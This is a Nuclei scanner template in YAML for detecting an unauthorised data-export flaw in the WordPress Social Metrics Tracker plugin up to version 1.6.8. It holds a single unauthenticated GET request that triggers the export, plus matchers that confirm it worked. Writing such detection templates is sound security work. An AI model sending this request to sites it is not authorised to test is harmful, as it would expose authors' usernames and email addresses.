32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: wordpress-social-metrics-tracker
|
|
|
|
info:
|
|
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
|
|
author: randomrobbie
|
|
severity: medium
|
|
description: |
|
|
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
|
|
metadata:
|
|
max-request: 1
|
|
tags: wordpress,wp-plugin,wp,unauth,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Main URL to Post"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502201f9f30c3b6e97d48c048b959441507204c93bab43b840baf5ec063666c6a66ed0221009fce57423faf3f16c5ae95b220591d5938cf46c4bd0bc3f8337663800250f73c:922c64590222798bb761d5b6d8e72950
|